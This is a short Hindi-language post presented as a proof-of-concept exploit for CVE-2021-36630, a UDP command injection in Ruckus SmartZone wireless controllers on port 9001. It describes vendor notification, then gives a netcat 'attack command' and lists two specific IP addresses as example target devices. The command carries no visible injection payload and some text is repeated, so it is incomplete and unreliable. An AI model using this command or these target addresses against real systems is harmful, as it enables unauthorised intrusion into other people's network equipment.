
CVE-2021-36630 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Ruckus SmartZone वायरलेस नियंत्रकों को पोर्ट 9001 पर UDP कमांड इंजेक्शन के माध्यम से लक्षित करता है।
Ruckus के SmartZone श्रृंखला उपकरणों में सुरक्षा जोखिम हैं। निर्माता को सूचित करने के बाद, उन्होंने सक्रिय रूप से जांच करने के लिए तकनीकी कर्मियों को संगठित किया। इस अवधि के दौरान, हमने कई बार सुरक्षा सुझाव और सत्यापन विधियाँ भी प्रदान कीं। 19 जुलाई को, कंपनी ने आधिकारिक तौर पर एक सुरक्षा घोषणा जारी की।
हमला कमांड: echo "" | nc -4u ip:address 9001
ipaddress उदाहरण: 62.210.8.110?111.107.251.71(RuckusWireless SZ ip)

SmartZone-100 - सभी सभी - Virtual SmartZone
http://ruckus.com http://smartzone-100.com https://anquan.baidu.com/article/1434